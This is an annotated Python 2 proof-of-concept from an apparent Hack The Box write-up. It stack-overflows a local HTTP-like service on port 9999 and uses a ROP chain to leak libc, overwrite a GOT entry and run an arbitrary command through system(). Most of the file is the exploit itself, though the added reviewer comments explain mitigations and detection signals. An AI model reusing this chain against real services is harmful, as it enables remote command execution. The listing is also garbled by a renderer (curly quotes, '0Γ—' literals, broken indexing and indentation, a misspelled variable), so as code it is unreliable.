
#!/usr/bin/python
import os, sys, socket
import struct
import requests

# Proof-of-concept from the author's HTB write-up: a stack smash of a local
# service on port 9999 that builds a ROP chain to leak a libc address, patch
# a GOT entry and hand a command string to system().  Python 2 syntax
# throughout (print statements, str payloads passed to send()).
#
# Defender-side reading of what the chain depends on, taken from the
# addresses and comments below: fixed 0x40xxxx code addresses (so the
# binary is presumably loaded at a fixed base, i.e. not PIE), a writable
# GOT (no full RELRO), and saved RBX/RBP/return slots reachable past a
# ~535-byte buffer with nothing detecting the overwrite in between (no stack
# canary, or one that is not checked on this path - not visible here).
# Each of those is an independent build-time mitigation that would break a
# step of this chain.
#
# NOTE(review): the wiki renderer has mangled this listing - curly quotes,
# "0Γ—" where "0x" was meant, "sys.argv1", and several '#' comment lines
# turned into numbered lists.  It is not valid Python as shown and is kept
# byte-for-byte here; only comments have been added.

# Loopback target only: (host, port) the script connects to.
addr = (β€˜127.0.0.1’, 9999)

# Command string staged for the final call, NUL-terminated so it reads as a
# C string.  ("sys.argv1" is presumably sys.argv[1] before the renderer
# dropped the brackets.)
cmd = sys.argv1+"\0"
#cmd = β€˜ls’

# Offsets of read() and system() inside the particular libc build the
# author analysed.  They are build-specific, which is why the chain has to
# leak a runtime address first: ASLR moves libc as a whole but not the
# distance between two of its functions.
libcread_offset = 0Γ—0e8050
libcsystem_offset = 0Γ—042510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Request-line prefix; everything after "GET /" is the over-long path that
# overflows the server-side buffer.  Detection note: the finished request
# line is several hundred bytes of A/B/C/D filler followed by non-printable
# 8-byte little-endian values - an over-long path or non-printable bytes in
# the request line are both cheap signals for an IDS/WAF rule.
payload = r’GET /\AAAA’

#filler – fill buffer with A’s , thought this would be 536 – 4, but turns out to be 535
payload += β€˜A’ * (535 – 4)

#overwrite RBX – offset 536
payload += β€˜B’ * 8

#overwrite RBP – offset 544
payload += β€˜C’ * 8

#fill before start of RSP – offset 568
payload += β€˜D’ * 16

# ROP chain proper.  Each step is "call target, pop-pop-pop-ret gadget, then
# three 8-byte argument values"; the PPPR gadget at 0x401787 (per the
# author's comment) pops the three values into registers before returning
# to the next call.  Fd 4 is labelled stdin/stdout below but is presumably
# the accepted client socket - verify against the target binary.

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
# Step 1: read(4, .dynamic, len(cmd)) - stage the command string in a
# writable data region.
someother = struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—000401787) #PPPR
someother += struct.pack(β€œ<Q”, 4) #stdin
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr
someother += struct.pack(β€œ<Q”, len(cmd)) #len of cmd

#leak address of read() in randomised libc
# Step 2: write(4, &GOT[read], 8) - the info leak that defeats libc ASLR.
# With PIE the write@plt address itself would not be fixed, removing the
# leak primitive.
someother += struct.pack(β€œ<Q”, 0Γ—400c50) #write() call loc
someother += struct.pack(β€œ<Q”, 0Γ—000401787) #PPPR
someother += struct.pack(β€œ<Q”, 4) #stdout
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += struct.pack(β€œ<Q”, 8) #len

#call read@plt to overwrite the ptr stored in GOT
# Step 3: read(4, &GOT[read], 8) - overwrite read()'s GOT slot with the
# value computed client-side at the bottom of the script.  Full RELRO
# (-Wl,-z,relro,-z,now) makes the GOT read-only after loading and would
# stop this write outright.
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—000401787) #PPPR
someother += struct.pack(β€œ<Q”, 4) #stdin
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += struct.pack(β€œ<Q”, 8) #len

#call read@plt with address of system() in libc
# Step 4: call through read@plt again - after step 3 its GOT slot points at
# system().  The 8 bytes of 'F' are filler for a slot the author marks as
# unused, followed by the .dynamic address where the command was staged.
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += β€˜FFFFFFFF’ # bogus (8 filler bytes)
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr system()

# NOTE(review): the two numbered lines below were a '#' comment restating
# the libc offsets; the wiki renderer turned them into a list.  Not
# executable as shown.
  1. libc read offset = 0Γ—0e8050
  2. libc system offset = 0Γ—042510

#padding – continue filler, writing into RSP
#payload += β€˜E’ * 150
# Append the chain after the saved-register filler.
payload = payload + someother

s.connect(addr)

#print(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /β€˜+’\n’)

# Wrap the payload in a curl-looking HTTP/1.1 request so the server parses
# it as a normal request; the extra blank lines terminate the headers.
s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /β€˜+’\n’+’\n’+’\n’)

# Consumed by step 1 of the chain (read into .dynamic).
s.send(cmd)

# NOTE(review): the numbered line below is another mangled '#' comment, and
# the four-space indent on the lines after it was added by the renderer -
# they are top-level statements.  Flow: receive the 8-byte leak from step
# 2, rebase system() from it using the offsets above, send the result back
# for step 3 to write into the GOT.
  1. calculate system() addr and send back
    readaddr = struct.unpack(β€œ<Q”, s.recv(1024))0
    print β€œlibc read() found at 0x%.8x” % readaddr
    systemaddr = readaddr – libcread_offset + libcsytem_offset
    print β€œlibc system() found at 0x%.8x” % systemaddr
    s.send(struct.pack(β€œ<Q”, systemaddr))

# Whatever the service sends back after the final call.
print s.recv(1024)

# NOTE(review): `s.close` without parentheses is an attribute reference,
# not a call; the socket is never explicitly closed here and is only
# released when the interpreter exits.
s.close
